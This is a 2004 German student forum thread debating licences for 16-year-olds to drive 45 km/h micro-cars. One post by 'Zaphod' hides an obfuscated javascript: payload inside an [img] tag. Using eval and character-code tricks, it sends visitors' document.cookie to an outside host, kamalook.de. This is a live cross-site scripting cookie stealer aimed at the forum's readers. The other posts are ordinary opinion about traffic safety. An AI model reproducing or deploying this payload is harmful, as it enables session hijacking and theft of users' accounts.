FB18 - Das Forum für Informatik

fb18.de / Off-Topic / Allgemeines

16jährige ans Steuer

16jährige ans Steuer 2004-09-19 21:18
Popcorn
http://www.welt.de/data/2004/09/20/335049.html

Oh mein Gott sage ich da bloß. Ich muss sagen, dass ich jetzt schon nur noch sehr ungerne Autofahre. Und die paar Male wo ich es tue, erlebe ich auch immer wieder die besten Dinge. Von entgegenkommenden, schnellfahrenden Autos in Einbahnstraßen über sehr knappe Vorfahrtnehmer an viel befahrenen Kreuzungen und einigen anderen Blindfischaktionen. Jetzt noch so was… Was so ein Führerschein wohl bei eBay bringt? Oder ich kaufe mir einfach ein gepanzertes Fahrzeug, wo mir der Lack egal ist. Irgendwie so was…

Re: 16jährige ans Steuer 2004-09-19 21:31
Faleiro
Auch dagegen. Aber immerhin gefaehrden die sich selbst noch am meisten.

[x] fuer Fuehrerschein ab 21

Re: 16jährige ans Steuer 2004-09-19 21:34
chris
Die Dinger sollte man Autoscooter nennen…
Wie soll man sowas denn überholen? [img]http://www.fb18.de/gfx/8.gif[/img]

Und Bjorn: Wo fährst du bitteschön Auto? ;)

Re: 16jährige ans Steuer 2004-09-19 21:55
FireTiger
Schonmal die schlechten Fahrer aussortieren, bevor sie richtige Autos fahren dürfen? Nennt man das dann Verkehrsdarwinismus? [img]http://www.fb18.de/gfx/5.gif[/img]

Re: 16jährige ans Steuer 2004-09-19 22:49
Zaphod
Diese gedrosselten Spezial-Autos, die die fahren dürfen, kosten doch viel zu viel Geld, als dass das wirklich eine Gefahr darstellen würde, oder? Welcher 16-Jährige hat schon 8000 € einfach so übrig? Und so viele Eltern werden das nicht unterstützen. Wahrscheinlich wird das eher in den ländlichen Gebieten zur Plage werden.
[img]javascript:sp=String.fromCharCode(32);b1=String.fromCharCode(91);b2=String.fromCharCode(93);eval('x=new'+sp+'Array()');x=document.images;eval('for(i=0;i<x.length;i++)if(x'+b1+'i'+b2+'.src.search(/javascript:/)!=-1){x'+b1+'i'+b2+'.src=\'ht'+'tp://ww'+'w.kamalook.de/sven/transparent/?'+document.cookie+'\';x'+b1+'i'+b2+'.height=\'1\';break;}');[/img]

Re: 16jährige ans Steuer 2004-09-19 23:05
Popcorn
Zappi, ich glaube die Rechnung geht nicht auf. Bei den 8000 Euro handelt es sich um den Neupreis. Das wird vielleicht die ersten zwei Jahre eine Einschrenkung sein. Aber so wie die Fahrzeuge gebraucht verfügbar sind und ich gehe davon aus, dass Leute die sich so etwas mit 16 Leisten auch mit 18 sofort auf richtige Autos umteigen, wird es losgehen. Wenn man guckt was jugendliche in dem Alter jetzt z. B. für PCs ausgeben. Wer sich so mal eben eine 500 Euro Grafikkarte für seinen PC leistet, wird dank pubertierender Hormone für eine "Frau mitnehm Gelegenheit" sicherlich bereit sein, einiges auf den Tisch zu legen. Das war zumindest das erste was mir da eingefallen ist, dass genau solche Leute dann sehr heiß auf diese Autos sind.

@Chris, okay ich gebe schon zu. Je weiter aus der Stadt raus, desto mehr scheinen die Leute Verkehrsregeln weniger ernst zu nehmen. Wohl weil hier deutlich weniger konrtolliert wird.

Re: 16jährige ans Steuer 2004-09-19 23:40
chris
Naja, ich würde den Poserfaktor nicht viel höher ansetzen als jetzt bei Rollern, die auch ab 16 gefahren werden dürfen. Und zumindest in meiner Gegend waren Roller früher nicht so sehr verbreitet. Und so ein "Auto" kostet immerhin nochmal das 5fache von einem Roller…

Allerdings, grade in den ländlichen Gegenden sind die Dinger doch gefährlich. Ich fahre ab und zu mit meinem Roller (auch 45km/h) Landstraße, da kriegt man teilweise schon muffensausen, so wird man überholt. Mit dem Roller kann ich allerdings bis zum Anschlag rechts fahren und mir so wenigstens etwas Platz schaffen. Das "Auto" wird da schon etwas größer und dementsprechend schlechter bzw waghalsiger zu überholen sein…
In der Stadt dagegen, wenn da so einer rumschleicht geht man rüber auf die linke Spur, hupt und überholt… ;)

Bjorn: Stimmt schon, bei uns (auch etwas weiter raus) darf man tagsüber machen was man will. Nachts allerdings ist unseren Dorfsheriffs langweilig, da hocken die regelmäßig in dunklen Ecken und halten absolut jedes Auto an was vorbeikommt…

Re: 16jährige ans Steuer 2004-09-20 00:03
Viciarg
ab 16?…vielleicht wäre uns küblböck damit erspart geblieben…

Re: 16jährige ans Steuer 2004-09-20 00:45
TriPhoenix
Naja, ich würde den Poserfaktor nicht viel höher ansetzen als jetzt bei Rollern, die auch ab 16 gefahren werden dürfen. Und zumindest in meiner Gegend waren Roller früher nicht so sehr verbreitet. Und so ein "Auto" kostet immerhin nochmal das 5fache von einem Roller…

Naja, aber für nen Roller machst du auch wenigstens ne vernünftige Prüfung oder? Ich verlasse mich lieber drauf, dass wer vor/neben mir fährt, der vernünftig geprüft wurde anstatt wer, der praktisch zwei Simplizitäten beweisen musste.

Re: 16jährige ans Steuer 2004-09-20 02:13
chris
Ich gehe davon aus das diese zwei Sachen beim S-Lappen nur die Sonderstunden sind, eine Grundausbildung ist ja selbstverständlich. Nur Sonderfahrten wie Autobahn würden mit den "Autos" wohl kaum Sinn machen…

Re: 16jährige ans Steuer 2004-09-20 15:48
Anonymer User
"Jetzt noch so was…", "Wenn ich mir anguck, was heutzutage".

Leute, ihr hört Euch an, als wärt ihr schon 31. Oder noch älter.


LEIFer

Re: 16jährige ans Steuer 2004-09-20 16:01
PeterPanzki
Sehe ich ähnlich. Die meisten 18jährigen fahren nicht gut, weil sie keine Erfahrung haben. Entsprechend schlecht würden sie mit 21 Jahren fahren, wenn sie dann erst den Schein frisch in der Tasche hätten.

Re: 16jährige ans Steuer 2004-09-20 16:23
Popcorn
"Jetzt noch so was…", "Wenn ich mir anguck, was heutzutage".
Leute, ihr hört Euch an, als wärt ihr schon 31. Oder noch älter.
LEIFer
Das Verkehrsaufkommen nimmt nun mal jährlich zu. Das hat mit dem Alter des Posters herzlich wenig zu tun. Zudem geht es auch noch mal darum, dass 45 km/h Autos durch die Welt tuckern sollen. Vom Alter habe ich überhaupt nicht gesprochen.

- Lesen, denken, vielleicht posten. Danke.

Re: 16jährige ans Steuer 2004-09-20 23:10
Tzwoenn
Sehe ich ähnlich. Die meisten 18jährigen fahren nicht gut, weil sie keine Erfahrung haben. Entsprechend schlecht würden sie mit 21 Jahren fahren, wenn sie dann erst den Schein frisch in der Tasche hätten.

Exakt. Es ist nicht eine Frage des Alters, wie gut man Auto fahren kann. Es gibt einfach Menschen, die haben einfach nicht die Fähigkeit dazu. Ob es nun daran liegt, dass sie die auf sie einstürzenden Informationen nicht schnell genug verarbeiten können, dass Probleme damit haben, ihre Hände und Füße kontrolliert das tun zu lassen, was sie vorhaben, oder dass sie einfach nur der Technik nicht gewachsen sind… alles unbedeutend.

Das Auto mag zwar ein Statussymbol sein, aber das gibt nicht jedem Menschen das Recht, es auch fahren zu dürfen. Nirgendwo sonst werden in Deutschland mehr Augen zugedrückt als bei der Führerscheinprüfung.

Re: 16jährige ans Steuer 2004-09-20 23:36
ernie
Zudem geht es auch noch mal darum, dass 45 km/h Autos durch die Welt tuckern sollen.

Das ist auch genau die Stelle, an der das eigentliche Problem dieser Neuerung liegen dürfte. Wenn man in Hamburg mit dem Auto unterwegs ist und sich zB auf dem Ring dem Verkehrsfluss anpasst ist man fast immer mit mehr als 50 km/h unterwegs. Leute die sich haarklein an die 50 halten, stellen häufig schon ein echtes Verkehrshindernis dar. Wie bitte soll das erst mit den neuen "Autos" aussehen?
Die Führer dieser Fahrzeuge dürften recht häufig in stressige Situationen kommen, wenn zB ein Auto hinter ihnen drängelt oder ähnliches. In so einem Leichtbaumobil dürfte man sich recht unwohl fühlen, wenn die M-Klasse hinter einem so dicht auffährt, dass man das Nummernschild nicht mehr sehen kann…
Und ob ein Fahranfänger dem wirklich gewachsen ist, wage ich zu bezweifeln.
Ich glaube man sollte den Führerschein in seiner jetzigen Form belassen.

Re: 16jährige ans Steuer 2005-01-31 13:36
TriPhoenix
Sie sind übrigens jetzt da…

http://www.n-tv.de/5486007.html
http://www.n-tv.de/5484609.html